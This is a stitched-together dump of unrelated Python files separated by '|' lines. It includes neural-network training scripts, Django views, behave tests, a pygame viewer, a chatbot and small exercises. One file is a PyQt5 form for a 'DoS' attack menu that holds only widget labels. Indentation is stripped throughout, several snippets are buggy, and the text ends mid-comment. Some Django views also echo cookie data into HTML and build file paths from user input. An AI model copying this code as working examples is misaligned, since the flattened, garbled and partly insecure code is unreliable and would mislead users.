nn.BatchNorm2d(16),
nn.ReLU(True),
nn.Conv2d(16, 32, 3,2,1),
nn.BatchNorm2d(32),
nn.ReLU(True),
nn.Conv2d(32, 64, 3,2,1),
nn.BatchNorm2d(64),
nn.ReLU(True),
nn.Conv2d(64, 64, 2,2,0),
nn.BatchNorm2d(64),
nn.ReLU(True))
self.fc = nn.Sequential(
nn.Linear(64*2*2, 100),
nn.Linear(100, 10))
def forward(self, x): # forward
out = self.conv(x)
out = out.view(out.size(0), -1)
out = self.fc(out)
return out
model = Emm()
print(model)
model = model.cuda()
# 5.Def loss func and optimizer
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=learning_rate)
# 6.train
for epoch in range(num_epoches):
print('epoch {}'.format(epoch + 1))
running_loss = 0.0 #initialize loss & acc
running_acc = 0.0
for i, data in enumerate(train_loader, 1):
img, label = data
img = img.cuda()
label = label.cuda()
img = Variable(img) # transform tensor into variable
label = Variable(label)
# forward
out = model(img)
loss = criterion(out, label)
running_loss += loss.item() * label.size(0)
_, pred = torch.max(out, 1)
num_correct = (pred == label).sum()
accuracy = (pred == label).float().mean()
running_acc += num_correct.item()
# back forward
optimizer.zero_grad()
loss.backward()
optimizer.step()
print('Finish {} epoch, Loss: {:.6f}, Acc: {:.6f}'.format(
epoch + 1, running_loss / (len(train_dataset)), running_acc / (len(train_dataset))))
# 7.Def test_model
model.eval()
eval_loss = 0
eval_acc = 0
for data in test_loader:
img, label = data
# Wrap in variable
with torch.no_grad():
img = Variable(img).cuda()
label = Variable(label).cuda()
out = model(img)
loss = criterion(out, label)
eval_loss += loss.item() * label.size(0)
_, pred = torch.max(out, 1)
num_correct = (pred == label).sum()
eval_acc += num_correct.item()
# 8.Print loss & acc
print('Test Loss: {:.6f}, Acc: {:.6f}'.format(
eval_loss / (len(test_dataset)), eval_acc / (len(test_dataset))))
print()
'''
#print a image
print(train_dataset.train_dataset.size()) # (60000, 28)
print(train_dataset.train_labels.size()) # (60000)
plt.imshow(train_dataset.train_dataset[5].numpy(), cmap='gray')
plt.title('%i' % train_dataset.train_labels[5])
plt.show()
'''
import winsound #ring
winsound.Beep(32767,2000)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'DoS.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dos_MainWindow(object):
def setupUi(self, Dos_MainWindow):
Dos_MainWindow.setObjectName("Dos_MainWindow")
Dos_MainWindow.resize(471, 307)
self.centralwidget = QtWidgets.QWidget(Dos_MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(120, 20, 201, 20))
self.label.setObjectName("label")
self.l_dos1 = QtWidgets.QLabel(self.centralwidget)
self.l_dos1.setGeometry(QtCore.QRect(90, 80, 47, 13))
self.l_dos1.setObjectName("l_dos1")
self.l_dos2 = QtWidgets.QLabel(self.centralwidget)
self.l_dos2.setGeometry(QtCore.QRect(90, 110, 47, 13))
self.l_dos2.setObjectName("l_dos2")
self.inputDoS = QtWidgets.QLineEdit(self.centralwidget)
self.inputDoS.setGeometry(QtCore.QRect(70, 180, 113, 20))
self.inputDoS.setObjectName("inputDoS")
self.btnDoSChoice = QtWidgets.QPushButton(self.centralwidget)
self.btnDoSChoice.setGeometry(QtCore.QRect(190, 180, 75, 23))
self.btnDoSChoice.setObjectName("btnDoSChoice")
self.btnDoSVoltar = QtWidgets.QPushButton(self.centralwidget)
self.btnDoSVoltar.setGeometry(QtCore.QRect(290, 180, 75, 23))
self.btnDoSVoltar.setObjectName("btnDoSVoltar")
self.l_defesa_dos = QtWidgets.QLabel(self.centralwidget)
self.l_defesa_dos.setGeometry(QtCore.QRect(120, 230, 291, 20))
self.l_defesa_dos.setText("")
self.l_defesa_dos.setObjectName("l_defesa_dos")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(70, 80, 47, 13))
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(70, 110, 47, 13))
self.label_3.setObjectName("label_3")
Dos_MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(Dos_MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 471, 21))
self.menubar.setObjectName("menubar")
Dos_MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(Dos_MainWindow)
self.statusbar.setObjectName("statusbar")
Dos_MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(Dos_MainWindow)
QtCore.QMetaObject.connectSlotsByName(Dos_MainWindow)
def retranslateUi(self, Dos_MainWindow):
_translate = QtCore.QCoreApplication.translate
Dos_MainWindow.setWindowTitle(_translate("Dos_MainWindow", "DoS"))
self.label.setText(_translate("Dos_MainWindow", "Escolha o software para ataque DoS"))
self.l_dos1.setText(_translate("Dos_MainWindow", "DoS 1"))
self.l_dos2.setText(_translate("Dos_MainWindow", "DoS 2"))
self.btnDoSChoice.setText(_translate("Dos_MainWindow", "Escolher"))
self.btnDoSVoltar.setText(_translate("Dos_MainWindow", "Voltar"))
self.label_2.setText(_translate("Dos_MainWindow", "1 -"))
self.label_3.setText(_translate("Dos_MainWindow", "2 -"))
|
import math
A, B, C = input().split()
A = float(A)
B = float(B)
C = float(C)
Delta = (B*B) - (4*A*C)
if A == 0 or Delta < 0:
print('Impossivel calcular')
else:
x1 = (-B + math.sqrt(Delta))/(2*A)
x2 = (-B - math.sqrt(Delta))/(2*A)
print('R1 = {:.5f}'.format(x1))
print('R2 = {:.5f}'.format(x2))
|
"""
Dieses Programm trainiert das neuronale Netz.
Dafür werden die Daten aus dem "dataset"-Verzeichnis verwendet.
Verwendung: 'python3 train-netzwerk.py'
(am besten zusamen mit 'nice' ausführen, da das Training lange
dauert und sehr rechenintensiv ist)
"""
import sys
import os
import numpy as np
from keras.applications import VGG16
from keras.models import Sequential
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.layers import Dropout, Flatten, Dense, Activation
from keras import callbacks
from keras import optimizers
from keras.preprocessing.image import ImageDataGenerator
np.random.seed(42)
DEV = False
argvs = sys.argv
argc = len(argvs)
if argc > 1 and (argvs[1] == "--development" or argvs[1] == "-d"):
DEV = True
if DEV:
epochs = 3
else:
epochs = 30
train_data_path = './data/train'
validation_data_path = './data/validation'
"""
Parameters
"""
img_width, img_height = 224, 224
input_shape = (img_width, img_height, 3)
batch_size = 32
samples_per_epoch = 2000
validation_samples = 235
filters1 = 32
filters2 = 64
conv1_size = 3
conv2_size = 2
pool_size = 2
classes_num = 3
lr = 0.0004
vgg16_net = VGG16(weights='imagenet', include_top=False, input_shape=(224, 224, 3))
vgg16_net.trainable = False
model = Sequential()
model.add(vgg16_net)
# Add a new classifier to the model
model.add(Flatten())
model.add(Dense(256))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(classes_num))
model.add(Activation('softmax'))
model.compile(loss = 'categorical_crossentropy',
optimizer = optimizers.RMSprop(lr=lr),
metrics = ['accuracy'])
train_datagen = ImageDataGenerator(
rescale=1. / 255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1. / 255)
train_generator = train_datagen.flow_from_directory(
train_data_path,
target_size=(img_height, img_width),
batch_size=batch_size,
class_mode='categorical')
validation_generator = test_datagen.flow_from_directory(
validation_data_path,
target_size=(img_height, img_width),
batch_size=batch_size,
class_mode='categorical')
"""
Tensorboard log
"""
log_dir = './tf-log/'
tb_cb = callbacks.TensorBoard(log_dir=log_dir, histogram_freq=0)
cbks = [tb_cb]
model.fit_generator(
train_generator,
steps_per_epoch = samples_per_epoch // batch_size,
epochs = epochs,
verbose = 1,
workers = 1,
use_multiprocessing = False,
validation_data = validation_generator,
callbacks = cbks,
validation_steps = validation_samples // batch_size)
target_dir = './models/'
if not os.path.exists(target_dir):
os.mkdir(target_dir)
model.save('./models/model.h5')
model.save_weights('./models/weights.h5')
|
import random
from card import card
class deck:
"""
model of a deck
"""
def __init__(self):
"""
initialize deck object
"""
self.cardList = []
deck.generate(self)
def generate(self):
"""
generates a deck of 52 cards
:return: none
"""
for i in range(0,4):
for j in range(2,15):
if i == 0: #Heart suit
suit = "heart"
if i == 1: #Diamond suit
suit = "diamond"
if i == 2: #spade suit
suit = "spade"
if i == 3: #club suit
suit = "club"
self.cardList.append(card(j, suit))
random.shuffle(self.cardList)
def drawCard(self):
"""
draws a card from the deck
:return: card
"""
if len(self.cardList) != 0:
    return self.cardList.pop()
else:
    # deck exhausted: rebuild and reshuffle this deck in place, then deal from it
    self.generate()
    return self.cardList.pop()
def printDeck(self):
"""
prints deck of cards
:return: none
"""
for card in self.cardList:
card.printCard()
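# --- Hedged demo (not part of the original class) ---
# card(j, suit) and card.printCard() are assumed to behave as used above.
if __name__ == "__main__":
    d = deck()
    top = d.drawCard()
    top.printCard()
    print(len(d.cardList), "cards left")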
|
from estnltk_workflows.postgres_collections.argparse import get_arg_parser
from estnltk_workflows.postgres_collections.argparse import parse_args
from estnltk_workflows.postgres_collections.data_processing.tag_collection import tag_collection
|
import FWCore.ParameterSet.Config as cms
#PreselectionCuts = cms.EDFilter('SkimmingCuts',doMuonOnly=cms.bool(False))
#MuonPreselectionCuts = cms.EDFilter('SkimmingCuts',doMuonOnly=cms.bool(True))
NoPreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string(""))
MuonPreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("Mu"))
ElePreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("Ele"))
DoubleMuPreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("DoubleMu"))
DoubleElePreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("DoubleEle"))
MuOrElePreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("MuOrElePre"))
EMuTvariablePreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("EMuTvariable"))
MuTauPreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("MuTau"))
|
#!/usr/bin/env python
import argparse
import inception
# Load model and categories at startup
model, synsets = inception.load_inception_model()
# Detect image with MXNet
image = inception.load_image('images/image1.jpg')
prob = inception.predict(image, model)
topN = inception.get_top_categories(prob, synsets)
#print(topN)
top1_message = inception.get_top1_message(topN)
print(top1_message)
def main():
parser = argparse.ArgumentParser()
parser.parse_args()
if __name__ == "__main__":
main()
|
with open("day7input.txt", "r") as f:
input_data = f.read()
progdict = {}
for line in input_data.split("\n"):
print(line)
arrow = line.find('>')
if arrow > 0:
children = line[arrow+2:].split(', ')
print(children)
parent = line[:arrow-2].split()[0]
weight = int(line[:arrow-2].split()[1].strip("()"))
progdict[parent] = (children, weight)
else:
child = line.split()[0]
weight = int(line.split()[1].strip("()"))
progdict[child] = (None, weight)  # keep the weight for leaf programs too
print(progdict)
class prog:
def __init__(self):
self.children = []
# assumes self.children holds the child subtree weights and self.weight is set elsewhere
def totalweightonself(self):
    if len(self.children) == 0:
        return self.weight
    else:
        return sum(self.children) + self.weight
def arechildrenbalanced(self):
    if len(set(self.children)) == 1:
        return True
    else:
        return False
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def input(request):
return render(request,'base.html')
def add(request):
x=int(request.GET['t1'])
y=int(request.GET['t2'])
z=x+y
resp=HttpResponse("<html><body bgcolor=blue><h1>values submitted successfully</h1></body></html>")
resp.set_cookie('z',z,max_age=40)
#help(resp.set_cookie)
return resp
def display(request):
for a,b in request.COOKIES.items():
print(a,b)
if 'z' in request.COOKIES:
sum=request.COOKIES['z']
return HttpResponse("<html><body bgcolor=green><h1>Addition of two number is</h1></body></html>"+sum)
else:
return render(request,'base.html')
|
from behave import *
from fastapi import testclient
import api
from fastapi.testclient import TestClient
@given("que deseo sumar dos numeros")
def step_implementation(context):
context.app = TestClient(api.app)
@when('yo ingrese los numeros {num1} y {num2}')
def step_implementation(context, num1, num2):
context.api_response = context.app.get(f'/sumar?num1={num1}&num2={num2}')
print(context.api_response.status_code)
assert 200 == context.api_response.status_code
@then('El resultado {result} debe ser la suma de ambos')
def step_implementation(context, result):
assert str(result) == str(context.api_response.json().get('total'))
@given("que yo deseo restar dos numeros")
def step_implementation(context):
context.app = TestClient(api.app)
@when('yo inserte los numeros {num1} y {num2} para restar')
def step_implementation(context, num1, num2):
context.api_response = context.app.get(f'/restar?num1={num1}&num2={num2}')
print(context.api_response.status_code)
assert 200 == context.api_response.status_code
@then('El resultado {result} debe ser la diferencia de ambos')
def step_implementation(context, result):
assert str(result) == str(context.api_response.json().get('total'))
@given("deseo multiplicar dos numeros")
def step_implementation(context):
context.app = TestClient(api.app)
@when('yo provea los numeros {num1} y {num2} para multiplicar')
def step_implementation(context, num1, num2):
context.api_response = context.app.get(f'/multiplicar?num1={num1}&num2={num2}')
print(context.api_response.status_code)
assert 200 == context.api_response.status_code
@then('El resultado {result} debe ser la multiplicacion de ambos')
def step_implementation(context, result):
assert str(result) == str(context.api_response.json().get('total'))
@given("que yo deseo dividir dos numeros")
def step_implementation(context):
context.app = TestClient(api.app)
@when('yo someta los numeros {num1} y {num2} para dividir')
def step_implementation(context, num1, num2):
context.api_response = context.app.get(f'/dividir?num1={num1}&num2={num2}')
print("codigo GG", context.api_response.status_code)
assert 200 == context.api_response.status_code
@then('El resultado {result} debe ser la division de ambos')
def step_implementation(context, result):
assert str(result) == str(context.api_response.json().get('total'))
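# --- Hedged sketch of the FastAPI module these steps import as `api` ---
# The endpoint paths and the "total" response key are inferred from the requests above;
# the real api.py may differ, so this is left as a commented illustration only.
#
# from fastapi import FastAPI
# app = FastAPI()
#
# @app.get("/sumar")
# def sumar(num1: float, num2: float):
#     return {"total": num1 + num2}
#
# @app.get("/restar")
# def restar(num1: float, num2: float):
#     return {"total": num1 - num2}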
|
import numpy as np
from mnist import MNIST
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.data
from torch.autograd import Variable
import pandas as pd
mndata = MNIST('data')
np.set_printoptions(precision=2, suppress=True)
X_train, y_train = mndata.load_training()
X_test, y_test = mndata.load_testing()
X_train, y_train = np.array(X_train)/255, np.array(y_train)
X_test, y_test = np.array(X_test)/255, np.array(y_test)
BATCH_SIZE = 32
torch_X_train = torch.from_numpy(X_train).type(torch.LongTensor)
torch_y_train = torch.from_numpy(y_train).type(torch.LongTensor) # data type is long
# create feature and targets tensor for test set.
torch_X_test = torch.from_numpy(X_test).type(torch.LongTensor)
torch_y_test = torch.from_numpy(y_test).type(torch.LongTensor) # data type is long
# Pytorch train and test sets
train = torch.utils.data.TensorDataset(torch_X_train,torch_y_train)
test = torch.utils.data.TensorDataset(torch_X_test,torch_y_test)
# data loader
train_loader = torch.utils.data.DataLoader(train, batch_size = BATCH_SIZE, shuffle = False)
test_loader = torch.utils.data.DataLoader(test, batch_size = BATCH_SIZE, shuffle = False)
torch_X_train = torch_X_train.view(-1, 1,28,28).float()
torch_X_test = torch_X_test.view(-1, 1,28,28).float()
print(torch_X_train.shape)
print(torch_X_test.shape)
# Pytorch train and test sets
train = torch.utils.data.TensorDataset(torch_X_train,torch_y_train)
test = torch.utils.data.TensorDataset(torch_X_test,torch_y_test)
# data loader
train_loader = torch.utils.data.DataLoader(train, batch_size = BATCH_SIZE, shuffle = False)
test_loader = torch.utils.data.DataLoader(test, batch_size = BATCH_SIZE, shuffle = False)
def fit(model, train_loader):
optimizer = torch.optim.Adam(model.parameters())#,lr=0.001, betas=(0.9,0.999))
error = nn.CrossEntropyLoss()
EPOCHS = 5
model.train()
for epoch in range(EPOCHS):
correct = 0
for batch_idx, (X_batch, y_batch) in enumerate(train_loader):
var_X_batch = Variable(X_batch).float()
var_y_batch = Variable(y_batch)
optimizer.zero_grad()
output = model(var_X_batch)
loss = error(output, var_y_batch)
loss.backward()
optimizer.step()
# Total correct predictions
predicted = torch.max(output.data, 1)[1]
correct += (predicted == var_y_batch).sum()
#print(correct)
if ((batch_idx) % 50 == 0):
print('Epoch : {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\t Accuracy:{:.3f}%'.format(
epoch, batch_idx*len(X_batch), len(train_loader.dataset), 100.*batch_idx / len(train_loader), loss.data, float(correct*100) / float(BATCH_SIZE*(batch_idx+1))))
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
self.conv1 = nn.Conv2d(1, 32, kernel_size=5)
self.conv2 = nn.Conv2d(32, 32, kernel_size=5)
self.conv3 = nn.Conv2d(32,64, kernel_size=5)
self.fc1 = nn.Linear(3*3*64, 256)
self.fc2 = nn.Linear(256, 10)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.relu(F.max_pool2d(self.conv2(x), 2))
x = F.dropout(x, p=0.5, training=self.training)
x = F.relu(F.max_pool2d(self.conv3(x),2))
x = F.dropout(x, p=0.5, training=self.training)
x = x.view(-1,3*3*64 )
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training)
x = self.fc2(x)
return F.log_softmax(x, dim=1)
cnn = CNN()
print(cnn)
it = iter(train_loader)
X_batch, y_batch = next(it)
print(cnn.forward(X_batch).shape)
fit(cnn,train_loader)
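# --- Hedged follow-up sketch (not in the original script): accuracy on the held-out test set ---
def evaluate(model, loader):
    model.eval()
    correct = 0
    with torch.no_grad():
        for X_batch, y_batch in loader:
            preds = torch.max(model(X_batch.float()), 1)[1]
            correct += (preds == y_batch).sum().item()
    return correct / len(loader.dataset)

print("Test accuracy: {:.3f}".format(evaluate(cnn, test_loader)))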
|
# -*- coding: utf-8 -*-
from .basic import index
from .feed import AtomFeed, RssFeed
app_name = 'yyfeed'
|
import random
import json
import torch
from model import NeuralNet
from nltk_utils import bag_of_words, tokenize
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
with open('intents.json', 'r') as json_data:
intents = json.load(json_data)
FILE = "data.pth"
data = torch.load(FILE)
input_size = data["input_size"]
hidden_size = data["hidden_size"]
output_size = data["output_size"]
all_words = data['all_words']
tags = data['tags']
model_state = data["model_state"]
model = NeuralNet(input_size, hidden_size, output_size).to(device)
model.load_state_dict(model_state)
model.eval()
def chat(msg):
a=""
while True:
sentence = msg
sentence = tokenize(sentence)
X = bag_of_words(sentence, all_words)
X = X.reshape(1, X.shape[0])
X = torch.from_numpy(X).to(device)
output = model(X)
_, predicted = torch.max(output, dim=1)
tag = tags[predicted.item()]
probs = torch.softmax(output, dim=1)
prob = probs[0][predicted.item()]
if prob.item() > 0.75:
for intent in intents['intents']:
if tag == intent["tag"]:
responses = intent['responses']
for ans in responses :
a=a+ans+'<br/>'
return(a)
else:
answer = "Sorry, but I don't understand your query; if you don't receive a response, please try to rephrase your question, or provide <a style=\"color:#00fff2\" href='https://forms.gle/kjCfXRA8u31hxeSs5' target='_blank'>feedback here.</a>"
return(answer)
|
#!/bin/env python
#using the wireframe module downloaded from http://www.petercollingridge.co.uk/
import mywireframe as wireframe
import pygame
from pygame import display
from pygame.draw import *
import time
import numpy
key_to_function = {
pygame.K_LEFT: (lambda x: x.translateAll('x', -10)),
pygame.K_RIGHT: (lambda x: x.translateAll('x', 10)),
pygame.K_DOWN: (lambda x: x.translateAll('y', 10)),
pygame.K_UP: (lambda x: x.translateAll('y', -10)),
pygame.K_EQUALS: (lambda x: x.scaleAll(1.25)),
pygame.K_MINUS: (lambda x: x.scaleAll( 0.8)),
pygame.K_q: (lambda x: x.rotateAll('X', 0.1)),
pygame.K_w: (lambda x: x.rotateAll('X', -0.1)),
pygame.K_a: (lambda x: x.rotateAll('Y', 0.1)),
pygame.K_s: (lambda x: x.rotateAll('Y', -0.1)),
pygame.K_z: (lambda x: x.rotateAll('Z', 0.1)),
pygame.K_x: (lambda x: x.rotateAll('Z', -0.1))}
class ProjectionViewer:
""" Displays 3D objects on a Pygame screen """
def __init__(self, width, height):
self.width = width
self.height = height
self.screen = pygame.display.set_mode((width, height))
pygame.display.set_caption('Wireframe Display')
self.background = (10,10,50)
self.wireframes = {}
self.displayNodes = True
self.displayEdges = True
self.nodeColour = (255,255,255)
self.edgeColour = (200,200,200)
self.nodeRadius = 3 #Modify to change size of the spheres
def addWireframe(self, name, wireframe):
""" Add a named wireframe object. """
self.wireframes[name] = wireframe
def run(self):
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key in key_to_function:
key_to_function[event.key](self)
self.display()
pygame.display.flip()
def display(self):
""" Draw the wireframes on the screen. """
self.screen.fill(self.background)
for wireframe in self.wireframes.values():
if self.displayEdges:
for edge in wireframe.edges:
pygame.draw.aaline(self.screen, self.edgeColour, (edge.start.x, edge.start.y), (edge.stop.x, edge.stop.y), 1)
if self.displayNodes:
for node in wireframe.nodes:
if node.visiblity:
pygame.draw.circle(self.screen, self.nodeColour, (int(node.x), int(node.y)), self.nodeRadius, 0)
def translateAll(self, axis, d):
""" Translate all wireframes along a given axis by d units. """
for wireframe in self.wireframes.values():
wireframe.translate(axis, d)
def scaleAll(self, scale):
""" Scale all wireframes by a given scale, centred on the centre of the screen. """
centre_x = self.width/2
centre_y = self.height/2
for wireframe in self.wireframes.values():
wireframe.scale((centre_x, centre_y), scale)
def rotateAll(self, axis, theta):
""" Rotate all wireframe about their centre, along a given axis by a given angle. """
rotateFunction = 'rotate' + axis
for wireframe in self.wireframes.values():
centre = wireframe.findCentre()
getattr(wireframe, rotateFunction)(centre, theta)
def createCube(self,cube,X=[50,140], Y=[50,140], Z=[50,140]):
cube.addNodes([(x,y,z) for x in X for y in Y for z in Z]) #adding the nodes of the cube framework.
allnodes = []
cube.addEdges([(n,n+4) for n in range(0,4)]+[(n,n+1) for n in range(0,8,2)]+[(n,n+2) for n in (0,1,4,5)]) #creating edges of the cube framework.
for i in range(0,10):
for j in range(0,10):
for k in range(0,10):
allnodes.append((X[0]+(X[1]-X[0])/9 * i,Y[0]+(Y[1] - Y[0])/9 * j,Z[0] + (Z[1]-Z[0])/9 * k))
cube.addNodes(allnodes)
#cube.outputNodes()
self.addWireframe('cube',cube)
def findIndex(coords): # Send coordinates of the points you want lit up; converts them to the needed LED indices.
indices = []
for nodes in coords:
x,y,z = nodes
index = x*100+y*10+z + 8
indices.append(index)
return indices
def findIndexArray(array): #Takes a 3-D numpy array containing bool of all the LED points.
indices = []
for i in range(0,10):
for j in range(0,10):
for k in range(0,10):
if(array[i][j][k] == 1):
index = i*100+j*10+ k + 8
indices.append(index)
return indices
def wireframecube(size):
if size % 2 == 1:
size = size+1
half = size/2
start = 5 - half
end = 5 + half - 1
cubecords = [(x,y,z) for x in (start,end) for y in (start,end) for z in range(start,end+1)]+[(x,z,y) for x in (start,end) for y in (start,end) for z in range(start,end+1)] + [(z,y,x) for x in (start,end) for y in (start,end) for z in range(start,end+1)]
return cubecords
def cubes(size):
if size % 2 == 1:
size = size+1
half = size/2
cubecords = []
for i in range(0,size):
for j in range(0,size):
for k in range(0,size):
cubecords.append((5-half+i,5-half+j,5-half+k))
return cubecords
if __name__ == '__main__':
pv = ProjectionViewer(400, 300)
allnodes =[]
cube = wireframe.Wireframe() #storing all the nodes in this wireframe object.
X = [50,140]
Y = [50,140]
Z = [50,140]
pv.createCube(cube,X,Y,Z)
YZface = findIndex((0,y,z) for y in range(0,10) for z in range(0,10))
count = 0
for k in range(1,150000):
if k%5000 ==2500:
count = (count+2)%11
cube.setVisible(findIndex(wireframecube(count)))
pv.run()
|
#!/usr/bin/python3
def multiple_returns(sentence):
return (len(sentence), sentence[0] if (sentence) else None)
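# Illustrative examples (not part of the original module):
#     multiple_returns("Python")  ->  (6, 'P')
#     multiple_returns("")        ->  (0, None)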
|
string = "hello Tom, nice to meet you!"
def reverseString():
splittedArray = string.split(" ")
array = []
newstring = ""
for i in range(len(splittedArray)):
# array.pop()
if splittedArray[i].find(",")>-1:
print(f"before replace ,{splittedArray}")
splittedArray[i] = splittedArray[i].replace(",","")
print(f"after replace ,{splittedArray}")
myreversed =list(reversed(splittedArray[:i]))
for j in range(i):
newstring += myreversed[len(myreversed)-1:][0]
if splittedArray[j+1]:
newstring+ " "
newstring+=","
print(f"newstring={newstring}")
print(f"splittedArray={splittedArray}")
print(list(reversed(string.split(" "))))
reverseString()
|
"""This is the "main script" which will be run and from where the actual work will be done"""
from judge import upload
from judge import judge
from sites import tabroom
from sites import judge_phil
from global_vars import db
import getopt, sys
def remove_dup(arg):
name = arg.split(" ")
all_judges_first = db.child('judges').order_by_child('first_name').equal_to(name[0]).get().val().items()
all_judges_last = db.child('judges').order_by_child('last_name').equal_to(name[1]).get().val().items()
all_judges = [judge for judge in all_judges_last if judge in all_judges_first]
if len(all_judges) > 1:
print(arg, len(all_judges))
for jud in all_judges[1:]:
db.child('judges').child(jud[0]).remove()
def main(argv):
opts, args = getopt.getopt(argv,"upd:",['remove_all_dups', 'update-phil', 'get-id='])
for opt, arg in opts:
if opt == '--get-id':
#TODO: Consider storing the judge id in Firebase
name = arg.split(" ")
tb = tabroom()
for i in range(283, 57630):
print(i)
tb.query_for_judge(jud_id = i)
if tb.get_judge_name()[0].lower() == name[0].lower() and tb.get_judge_name()[1].lower() == name[1].lower():  # compare last names too (assumed intent)
print('jud_id is ' + str(i))
exit()
print('judge_not_found')
exit()
if opt == '--update-phil':
all_judges = list(db.child('judges').get().val().items())
print('downloaded')
tb = tabroom()
for key, data in all_judges:
try:
print(key, data['first_name'], data['last_name'])
if data['phil'].lower() == 'i love ashmita' or data['phil'].lower() == "no paradigm found":
print(' looking up paradigm')
if tb.update_judge_phil(data['first_name'], data['last_name']):
print('phil not found')
else:
print('phil found')
else:
print(' paradigm already known')
except:
print('fml')
exit()
if opt == '-p':
#Process uploads mode
all_new_ups = upload.get_all_new_uploads()
for up in all_new_ups:
try:
up.process()
except Exception as e:
#Assumes judge doesn't exist
# TODO: intelligent exceptions
fn, ls = up.get_value('firstName'), up.get_value('lastName')
judge.create_blank_judge(fn, ls)
if opt == '-u':
#Update mode = add info on all judges
tabroom.create_all_judges()
exit()
if opt == '-d':
#remove duplicates mode with arg as the "First Last" name
remove_dup(arg)
exit()
if opt == '--remove_all_dups':
all_judges = list(db.child('judges').get().val().items())
print('downloaded')
judges_data = [jud[1] for jud in all_judges]
print(len(all_judges))
for judge_data in judges_data:
remove_dup(judge_data['first_name'] + " " + judge_data['last_name'])
# names = [judge_data['first_name'] + " " + judge_data['last_name'] for judge_data in judges_data]
# for name in names:
# remove_dup(name) This fails with names = [judge_data['first_name'] + " " + judge_data['last_name'] for judge_data in judges_data]
#TypeError: string indices must be integers
exit()
if __name__ == "__main__":
main(sys.argv[1:])
|
from django.contrib import admin
from .models import Post
from .models import Post2
class PostAdmin(admin.ModelAdmin):
list_display=('title','author','created_date','published_date')
search_fields =('title',)
# Register your models here.
admin.site.register(Post,PostAdmin)
class PostAdmin2(admin.ModelAdmin):
list_display=('country_name','author','created_date','published_date')
search_fields =('country_name',)
# Register your models here.
admin.site.register(Post2,PostAdmin2)
|
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.views import generic
from django.template import loader
from django.core.paginator import Paginator
# Create your views here.
from .models import Messages
import os
import math
from django.http.response import Http404
def index(request):
template = loader.get_template('information/index.html')
context = {}
return HttpResponse(template.render(context,request))
def multiview(request,pagename):
FTP_UPLOAD_DIR = '/home/iskandar_amir/covid2/static/information/html/'
if os.path.exists(FTP_UPLOAD_DIR + pagename+".html"):
# if yes, then serve the page
with open(FTP_UPLOAD_DIR + pagename+".html") as f:
response = HttpResponse(f.read())
return response
else:
raise Http404
def cc(request):
template = loader.get_template('information/cc.html')
context = {}
return HttpResponse(template.render(context,request))
def dcc(request):
template = loader.get_template('information/dcc.html')
context = {}
return HttpResponse(template.render(context,request))
def pzc(request):
template = loader.get_template('information/pzc.html')
context = {}
return HttpResponse(template.render(context,request))
def messages(request, page=1):
length = 24
if(page<=0):
page=1
latest_message_list = Messages.objects.order_by('-timestamp')
paginator = Paginator(latest_message_list, 20)
page_obj = paginator.get_page(page)
context = {'latest_message_list': latest_message_list,
'page_obj':page_obj,
}
return render(request, 'information/messages.html', context)
# def messages(request, page=1):
# if(page<0):
# page=0
# the_message = Messages.objects.order_by('-timestamp')[page]
# context = {'the_message': the_message,
# 'prev_page':page-1,
# 'next_page':page+1 if len(latest_message_list)==length else 0,
# }
# return render(request, 'information/messages.html', context)
|
# usage: python USP_server_example.py <host> <port>
import sys
import os
import time
from unix_socket_protocol import USP_SERVER
def callback_func(json_str):
print(json_str)
if __name__ == "__main__":
server = USP_SERVER(sys.argv[1], callback_func, 10)
server.start_server()
print ("server started")
time.sleep(10)
print ("after 10s")
server.stop_server()
print ("server stopped")
|
"""
The file_utils module provides methods for accessing or manipulating the
filesystem.
"""
from ephemeral.definitions import ROOT_DIR
def get_relative_package_path():
"""Gets the relative path for the package useful to finding package relative
property files or other resources.
"""
return ROOT_DIR
|
def isPalindrome(s, i, j):
    # a substring is a palindrome when it equals its own reverse
    sub = s[i:j+1]
    return sub == sub[::-1]
def PP (i , j) :
global s
if (i >= j) :
return 0
else :
if (isPalindrome(s,i,j)) :
return 0
else :
minimum = float('inf')
for k in range (i,j) :
c = PP(i,k) + PP(k+1,j) + 1
if (c < minimum) :
minimum = c
return minimum
N = int(input())
s = input()
c = PP(0,N-1)
print(c)
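# --- Hedged note (not part of the original solution) ---
# The plain recursion above recomputes overlapping subproblems; a memoized sketch of the
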